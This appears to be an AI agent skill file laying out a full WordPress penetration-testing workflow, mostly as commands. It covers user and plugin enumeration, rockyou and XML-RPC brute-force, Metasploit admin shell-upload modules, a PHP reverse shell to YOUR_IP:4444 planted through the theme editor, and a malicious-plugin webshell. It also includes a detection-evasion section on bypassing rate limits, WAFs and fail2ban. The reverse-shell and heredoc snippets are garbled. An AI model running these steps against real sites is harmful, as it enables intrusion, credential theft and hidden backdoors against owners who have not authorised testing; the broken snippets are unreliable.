WordPress Penetration Testing Purpose Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing. Prerequisites Required Tools WPScan (pre-installed in Kali Linux) Metasploit Framework Burp Suite or OWASP ZAP Nmap for initial discovery cURL or wget Required Knowledge WordPress architecture and structure Web application testing fundamentals HTTP protocol understanding Common web vulnerabilities (OWASP Top 10) Outputs and Deliverables WordPress Enumeration Report - Version, themes, plugins, users Vulnerability Assessment - Identified CVEs and misconfigurations Credential Assessment - Weak password findings Exploitation Proof - Shell access documentation Core Workflow Phase 1: WordPress Discovery Identify WordPress installations:
Check for WordPress indicators
curl -s http://target.com | grep -i wordpress curl -s http://target.com | grep -i "wp-content" curl -s http://target.com | grep -i "wp-includes"
Check common WordPress paths
curl -I http://target.com/wp-login.php curl -I http://target.com/wp-admin/ curl -I http://target.com/wp-content/ curl -I http://target.com/xmlrpc.php
Check meta generator tag
curl -s http://target.com | grep "generator"
Nmap WordPress detection
nmap -p 80,443 --script http-wordpress-enum target.com Key WordPress files and directories: /wp-admin/ - Admin dashboard /wp-login.php - Login page /wp-content/ - Themes, plugins, uploads /wp-includes/ - Core files /xmlrpc.php - XML-RPC interface /wp-config.php - Configuration (not accessible if secure) /readme.html - Version information Phase 2: Basic WPScan Enumeration Comprehensive WordPress scanning with WPScan:
Basic scan
wpscan --url http://target.com/wordpress/
With API token (for vulnerability data)
wpscan --url http://target.com --api-token YOUR_API_TOKEN
Aggressive detection mode
wpscan --url http://target.com --detection-mode aggressive
Output to file
wpscan --url http://target.com -o results.txt
JSON output
wpscan --url http://target.com -f json -o results.json
Verbose output
wpscan --url http://target.com -v Phase 3: WordPress Version Detection Identify WordPress version:
WPScan version detection
wpscan --url http://target.com
Manual version checks
curl -s http://target.com/readme.html | grep -i version curl -s http://target.com/feed/ | grep -i generator curl -s http://target.com | grep "?ver="
Check meta generator
curl -s http://target.com | grep 'name="generator"'
Check RSS feeds
curl -s http://target.com/feed/ curl -s http://target.com/comments/feed/ Version sources: Meta generator tag in HTML readme.html file RSS/Atom feeds JavaScript/CSS file versions Phase 4: Theme Enumeration Identify installed themes:
Enumerate all themes
wpscan --url http://target.com -e at
Enumerate vulnerable themes only
wpscan --url http://target.com -e vt
Theme enumeration with detection mode
wpscan --url http://target.com -e at --plugins-detection aggressive
Manual theme detection
curl -s http://target.com | grep "wp-content/themes/" curl -s http://target.com/wp-content/themes/ Theme vulnerability checks:
Search for theme exploits
searchsploit wordpress theme < theme_name
Check theme version
curl -s http://target.com/wp-content/themes/ < theme
/style.css | grep -i version curl -s http://target.com/wp-content/themes/ < theme
/readme.txt Phase 5: Plugin Enumeration Identify installed plugins:
Enumerate all plugins
wpscan --url http://target.com -e ap
Enumerate vulnerable plugins only
wpscan --url http://target.com -e vp
Aggressive plugin detection
wpscan --url http://target.com -e ap --plugins-detection aggressive
Mixed detection mode
wpscan --url http://target.com -e ap --plugins-detection mixed
Manual plugin discovery
curl -s http://target.com | grep "wp-content/plugins/" curl -s http://target.com/wp-content/plugins/ Common vulnerable plugins to check:
Search for plugin exploits
searchsploit wordpress plugin < plugin_name
searchsploit wordpress mail-masta searchsploit wordpress slideshow gallery searchsploit wordpress reflex gallery
Check plugin version
curl -s http://target.com/wp-content/plugins/ < plugin
/readme.txt Phase 6: User Enumeration Discover WordPress users:
WPScan user enumeration
wpscan --url http://target.com -e u
Enumerate specific number of users
wpscan --url http://target.com -e u1-100
Author ID enumeration (manual)
for i in { 1 .. 20 } ; do curl -s "http://target.com/?author= $i " | grep -o 'author/[^/]*/' done
JSON API user enumeration (if enabled)
curl -s http://target.com/wp-json/wp/v2/users
REST API user enumeration
curl -s http://target.com/wp-json/wp/v2/users?per_page = 100
Login error enumeration
curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php Phase 7: Comprehensive Enumeration Run all enumeration modules:
Enumerate everything
wpscan --url http://target.com -e at -e ap -e u
Alternative comprehensive scan
wpscan --url http://target.com -e vp,vt,u,cb,dbe
Enumeration flags:
at - All themes
vt - Vulnerable themes
ap - All plugins
vp - Vulnerable plugins
u - Users (1-10)
cb - Config backups
dbe - Database exports
Full aggressive enumeration
wpscan --url http://target.com -e at,ap,u,cb,dbe \ --detection-mode aggressive \ --plugins-detection aggressive Phase 8: Password Attacks Brute-force WordPress credentials:
Single user brute-force
wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
Multiple users from file
wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
With password attack threads
wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
XML-RPC brute-force (faster, may bypass protection)
wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
Brute-force with API limiting
wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
Create targeted wordlist
cewl http://target.com -w wordlist.txt wpscan --url http://target.com -U admin -P wordlist.txt Password attack methods: wp-login - Standard login form xmlrpc - XML-RPC multicall (faster) xmlrpc-multicall - Multiple passwords per request Phase 9: Vulnerability Exploitation Metasploit Shell Upload After obtaining credentials:
Start Metasploit
msfconsole
Admin shell upload
use exploit/unix/webapp/wp_admin_shell_upload set RHOSTS target.com set USERNAME admin set PASSWORD jessica set TARGETURI /wordpress set LHOST < your_ip
exploit Plugin Exploitation
Slideshow Gallery exploit
use exploit/unix/webapp/wp_slideshowgallery_upload set RHOSTS target.com set TARGETURI /wordpress set USERNAME admin set PASSWORD jessica set LHOST < your_ip
exploit
Search for WordPress exploits
search type:exploit platform:php wordpress Manual Exploitation Theme/plugin editor (with admin access): // Navigate to Appearance > Theme Editor // Edit 404.php or functions.php // Add PHP reverse shell:
& /dev/tcp/YOUR_IP/4444 0>&1'" ) ; ?>// Or use weevely backdoor // Access via: http://target.com/wp-content/themes/theme_name/404.php Plugin upload method:
Create malicious plugin
cat
malicious.php << 'EOF'
EOF
Zip and upload via Plugins > Add New > Upload Plugin
zip malicious.zip malicious.php
Access webshell
curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id" Phase 10: Advanced Techniques XML-RPC Exploitation
Check if XML-RPC is enabled
curl -X POST http://target.com/xmlrpc.php
List available methods
curl
-X
POST
-d
'
Brute-force via XML-RPC multicall
cat
xmlrpc_brute.xml << 'EOF'
Use Tor proxy
wpscan --url http://target.com --proxy socks5://127.0.0.1:9050
HTTP proxy
wpscan --url http://target.com --proxy http://127.0.0.1:8080
Burp Suite proxy
wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks HTTP Authentication
Basic authentication
wpscan --url http://target.com --http-auth admin:password
Force SSL/TLS
wpscan --url https://target.com --disable-tls-checks Quick Reference WPScan Enumeration Flags Flag Description -e at All themes -e vt Vulnerable themes -e ap All plugins -e vp Vulnerable plugins -e u Users (1-10) -e cb Config backups -e dbe Database exports Common WordPress Paths Path Purpose /wp-admin/ Admin dashboard /wp-login.php Login page /wp-content/uploads/ User uploads /wp-includes/ Core files /xmlrpc.php XML-RPC API /wp-json/ REST API WPScan Command Examples Purpose Command Basic scan wpscan --url http://target.com All enumeration wpscan --url http://target.com -e at,ap,u Password attack wpscan --url http://target.com -U admin -P pass.txt Aggressive wpscan --url http://target.com --detection-mode aggressive Constraints and Limitations Legal Considerations Obtain written authorization before testing Stay within defined scope Document all testing activities Follow responsible disclosure Technical Limitations WAF may block scanning Rate limiting may prevent brute-force Some plugins may have false negatives XML-RPC may be disabled Detection Evasion Use random user agents: --random-user-agent Throttle requests: --throttle 1000 Use proxy rotation Avoid aggressive modes on monitored sites Troubleshooting WPScan Shows No Vulnerabilities Solutions: Use API token for vulnerability database Try aggressive detection mode Check for WAF blocking scans Verify WordPress is actually installed Brute-Force Blocked Solutions: Use XML-RPC method instead of wp-login Add throttling: --throttle 500 Use different user agents Check for IP blocking/fail2ban Cannot Access Admin Panel Solutions: Verify credentials are correct Check for two-factor authentication Look for IP whitelist restrictions Check for login URL changes (security plugins) When to Use This skill is applicable to execute the workflow or actions described in the overview.